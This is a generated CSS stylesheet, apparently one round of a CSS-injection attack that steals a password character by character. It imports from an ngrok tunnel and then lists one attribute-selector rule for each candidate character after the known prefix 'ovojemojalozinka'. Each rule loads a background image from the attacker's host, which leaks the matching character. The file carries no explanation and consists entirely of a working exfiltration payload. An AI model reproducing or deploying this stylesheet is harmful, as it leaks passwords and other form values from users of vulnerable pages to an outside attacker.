@import url("http://bc0a37bcf1d5.ngrok.io/?l=18");
input[value="ovojemojalozinka!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.6495715900217913");}
input[value="ovojemojalozinka\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.8120822386133055");}
input[value="ovojemojalozinka#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.9730579608991283");}
input[value="ovojemojalozinka$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.4337241901773281");}
input[value="ovojemojalozinka%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.9062921877919172");}
input[value="ovojemojalozinka&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.7318653167716009");}
input[value="ovojemojalozinka'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.8185192347713826");}
input[value="ovojemojalozinka("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.24927009309255932");}
input[value="ovojemojalozinka)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.9319971199965293");}
input[value="ovojemojalozinka*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.21929366458291866");}
input[value="ovojemojalozinka+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.35795950054058956");}
input[value="ovojemojalozinka,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.23059607449598696");}
input[value="ovojemojalozinka-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.0986213951382906");}
input[value="ovojemojalozinka."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.574529538062696");}
input[value="ovojemojalozinka/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.5370857500119035");}
input[value="ovojemojalozinka0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.5960191931487964");}
input[value="ovojemojalozinka1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.6608833766338804");}
input[value="ovojemojalozinka2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.7947906532263662");}
input[value="ovojemojalozinka3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.9239636304515391");}
input[value="ovojemojalozinka4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.7802642091080703");}
input[value="ovojemojalozinka5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.3851957792278118");}
input[value="ovojemojalozinka6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.9246745314210258");}
input[value="ovojemojalozinka7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.9702415987761339");}
input[value="ovojemojalozinka8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.5590893629376197");}
input[value="ovojemojalozinka9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.010618026703772987");}
input[value="ovojemojalozinka:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.6004347608219629");}
input[value="ovojemojalozinka;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.9759587489574908");}
input[value="ovojemojalozinka<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.33404374738862663");}
input[value="ovojemojalozinka="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.5074093607095493");}
input[value="ovojemojalozinka>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.9617241882250704");}
input[value="ovojemojalozinka?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.906323260195913");}
input[value="ovojemojalozinka@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.2036943721469946");}
input[value="ovojemojalozinkaA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.33847726300742464");}
input[value="ovojemojalozinkaB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.28824555490983017");}
input[value="ovojemojalozinkaC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.015402206720705802");}
input[value="ovojemojalozinkaD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.25247508255486206");}
input[value="ovojemojalozinkaE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.8259729626026311");}
input[value="ovojemojalozinkaF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.831003347970984");}
input[value="ovojemojalozinkaG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.49242825313193017");}
input[value="ovojemojalozinkaH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.5094627336384765");}
input[value="ovojemojalozinkaI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.06404518203396603");}
input[value="ovojemojalozinkaJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.5499738450030414");}
input[value="ovojemojalozinkaK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.45237768103911735");}
input[value="ovojemojalozinkaL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.2227844821088638");}
input[value="ovojemojalozinkaM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.6607591542482085");}
input[value="ovojemojalozinkaN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.40643596107430935");}
input[value="ovojemojalozinkaO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.49660763004672437");}
input[value="ovojemojalozinkaP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.5197369525261186");}
input[value="ovojemojalozinkaQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.8942097575020596");}
input[value="ovojemojalozinkaR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.51911403687304");}
input[value="ovojemojalozinkaS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.30938748329631127");}
input[value="ovojemojalozinkaT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.06848814515748414");}
input[value="ovojemojalozinkaU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.6250831038435027");}
input[value="ovojemojalozinkaV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.6876658357954524");}
input[value="ovojemojalozinkaW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.18853263578441593");}
input[value="ovojemojalozinkaX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.2885869857281649");}
input[value="ovojemojalozinkaY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.5891235439064848");}
input[value="ovojemojalozinkaZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.9093474916620312");}
input[value="ovojemojalozinka["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.04925051127792135");}
input[value="ovojemojalozinka\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.4112138458603296");}
input[value="ovojemojalozinka]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.9191917842316097");}
input[value="ovojemojalozinka^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.7806961854532231");}
input[value="ovojemojalozinka_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.4299654452109589");}
input[value="ovojemojalozinka`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.6537181171312887");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.7465155609101111");}
input[value="ovojemojalozinkab"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.4561488456855163");}
input[value="ovojemojalozinkac"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.4460596380613566");}
input[value="ovojemojalozinkad"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.9688215314596487");}
input[value="ovojemojalozinkae"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.4382831052214051");}
input[value="ovojemojalozinkaf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.6639053756858311");}
input[value="ovojemojalozinkag"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.37861404147679223");}
input[value="ovojemojalozinkah"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.3120218105827255");}
input[value="ovojemojalozinkai"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.7149963054128765");}
input[value="ovojemojalozinkaj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.49449906779888697");}
input[value="ovojemojalozinkak"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.35639517495084205");}
input[value="ovojemojalozinkal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.31686992055391805");}
input[value="ovojemojalozinkam"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.8087882799846644");}
input[value="ovojemojalozinkan"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.37417493277476055");}
input[value="ovojemojalozinkao"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.7344284443948415");}
input[value="ovojemojalozinkap"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.8182421395625505");}
input[value="ovojemojalozinkaq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.4385975439971821");}
input[value="ovojemojalozinkar"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.9092409137829112");}
input[value="ovojemojalozinkas"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.035441556600460666");}
input[value="ovojemojalozinkat"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.08064329215557287");}
input[value="ovojemojalozinkau"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.6599248136610372");}
input[value="ovojemojalozinkav"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.9434124655086866");}
input[value="ovojemojalozinkaw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.8674606268784633");}
input[value="ovojemojalozinkax"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.6090433676428457");}
input[value="ovojemojalozinkay"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.005452901919722697");}
input[value="ovojemojalozinkaz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.6904968861049756");}
input[value="ovojemojalozinka{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.5118729815587373");}
input[value="ovojemojalozinka|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.30291562845200626");}
input[value="ovojemojalozinka}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.5629787116726381");}
input[value="ovojemojalozinka~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.5523261793991572");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8211176559678341");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6891289824346756");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9568701259167238");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.07115746156491576");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3702555012279467");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8509686272222077");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6076981563633881");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5679932431041437");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.15063985446851857");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9166863376624617");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11261150423509991");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.0373327604791871");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5345271057357255");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6370782721092552");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8494802418044702");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.24884235457601633");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8709917633362558");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.314447493635055");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6343170780556482");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.32408297655432006");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.08377403669329131");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6333519104771168");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9481519888762477");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10098348161635817");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6454153669741378");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2708067560496772");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5030913201953038");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9965825365072916");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.763529267877596");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8716484433668412");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5322929132613312");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8423776437379504");}
input[value="ovojemojalozinka"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5082775596289233");}
input[value="ovojemojalozinka "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.3027719026065454");}
input[value="ovojemojalozinka¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.6377055473554083");}
input[value="ovojemojalozinka¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.6931226686183771");}
input[value="ovojemojalozinka£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.44950331388334597");}
input[value="ovojemojalozinka¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.4648657009937007");}
input[value="ovojemojalozinka¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.008726235632678048");}
input[value="ovojemojalozinka¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.11356251661126704");}
input[value="ovojemojalozinka§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.29582128671365693");}
input[value="ovojemojalozinka¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.6188453920645591");}
input[value="ovojemojalozinka©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.21995413601909952");}
input[value="ovojemojalozinkaª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.9199505100676353");}
input[value="ovojemojalozinka«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.1530241629787772");}
input[value="ovojemojalozinka¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.04611551156276361");}
input[value="ovojemojalozinka­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.2115741597855756");}
input[value="ovojemojalozinka®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.5213630558642164");}
input[value="ovojemojalozinka¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.33604729346943496");}
input[value="ovojemojalozinka°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.4181055301194525");}
input[value="ovojemojalozinka±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.3625488587942809");}
input[value="ovojemojalozinka²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.9790984324134855");}
input[value="ovojemojalozinka³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.7410434319177344");}
input[value="ovojemojalozinka´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.23608547438039684");}
input[value="ovojemojalozinkaµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.5464599058888442");}
input[value="ovojemojalozinka¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.6151226256570141");}
input[value="ovojemojalozinka·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.48803166307967594");}
input[value="ovojemojalozinka¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.6762854070903446");}
input[value="ovojemojalozinka¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.936504932160019");}
input[value="ovojemojalozinkaº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.946886681152709");}
input[value="ovojemojalozinka»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.8602672704439429");}
input[value="ovojemojalozinka¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.2800883519935322");}
input[value="ovojemojalozinka½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.33912478756216324");}
input[value="ovojemojalozinka¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.9696669627824033");}
input[value="ovojemojalozinka¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.8726427284503266");}
input[value="ovojemojalozinkaÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.6744124598555159");}
input[value="ovojemojalozinkaÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.8068845269906944");}
input[value="ovojemojalozinkaÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.02248378120795258");}
input[value="ovojemojalozinkaÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.9146865991634323");}
input[value="ovojemojalozinkaÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.2739715144644841");}
input[value="ovojemojalozinkaÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.9895741480167723");}
input[value="ovojemojalozinkaÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.4272375423069177");}
input[value="ovojemojalozinkaÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.509989638108008");}
input[value="ovojemojalozinkaÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.31389114323311507");}
input[value="ovojemojalozinkaÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.37466471711040006");}
input[value="ovojemojalozinkaÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.31457587891870586");}
input[value="ovojemojalozinkaË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.4849809192297876");}
input[value="ovojemojalozinkaÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.9925713756438479");}
input[value="ovojemojalozinkaÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.33147623122093783");}
input[value="ovojemojalozinkaÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.6492380435063514");}
input[value="ovojemojalozinkaÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.515130868504833");}
input[value="ovojemojalozinkaÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.7634734013215918");}
input[value="ovojemojalozinkaÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.5061239291884723");}
input[value="ovojemojalozinkaÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.3694562166562063");}
input[value="ovojemojalozinkaÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.2487320152095711");}
input[value="ovojemojalozinkaÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.2527839070975566");}
input[value="ovojemojalozinkaÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.7116749023842337");}
input[value="ovojemojalozinkaÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.08374415614563002");}
input[value="ovojemojalozinka×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.6168368195561134");}
input[value="ovojemojalozinkaØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.010631507442368182");}
input[value="ovojemojalozinkaÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.33409691541300934");}
input[value="ovojemojalozinkaÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.6460376141184923");}
input[value="ovojemojalozinkaÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.37016429808783746");}
input[value="ovojemojalozinkaÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.8825868497150275");}
input[value="ovojemojalozinkaÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.43994328937626936");}
input[value="ovojemojalozinkaÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.8658134756863491");}
input[value="ovojemojalozinkaß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.7122659216947802");}
input[value="ovojemojalozinkaà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.9470507037071005");}
input[value="ovojemojalozinkaá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.20925044964940542");}
input[value="ovojemojalozinkaâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.2864029432174551");}
input[value="ovojemojalozinkaã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.9114172944032519");}
input[value="ovojemojalozinkaä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.4017838359281216");}
input[value="ovojemojalozinkaå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.47125077377524516");}
input[value="ovojemojalozinkaæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.7485502143788476");}
input[value="ovojemojalozinkaç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.5027872673418492");}
input[value="ovojemojalozinkaè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.38239853248872935");}
input[value="ovojemojalozinkaé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.8014997050780086");}
input[value="ovojemojalozinkaê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.6659357843681666");}
input[value="ovojemojalozinkaë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.7282903154531308");}
input[value="ovojemojalozinkaì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.5200807685001343");}
input[value="ovojemojalozinkaí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.09281119056859666");}
input[value="ovojemojalozinkaî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.2020616077729207");}
input[value="ovojemojalozinkaï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.9532097690471908");}
input[value="ovojemojalozinkað"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.4898499560369669");}
input[value="ovojemojalozinkañ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.8278944127690355");}
input[value="ovojemojalozinkaò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.4836527291937758");}
input[value="ovojemojalozinkaó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.024623708788100496");}
input[value="ovojemojalozinkaô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.031455817498893035");}
input[value="ovojemojalozinkaõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.4551216898551209");}
input[value="ovojemojalozinkaö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.36892222782226725");}
input[value="ovojemojalozinka÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.7306179203734047");}
input[value="ovojemojalozinkaø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.20535577485548506");}
input[value="ovojemojalozinkaù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.3119657113982448");}
input[value="ovojemojalozinkaú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.4517612203638881");}
input[value="ovojemojalozinkaû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.5219706995775022");}
input[value="ovojemojalozinkaü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.3377724594463274");}
input[value="ovojemojalozinkaý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.7099279955604014");}
input[value="ovojemojalozinkaþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.2671682698418152");}
input[value="ovojemojalozinkaÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.6206488533901429");}
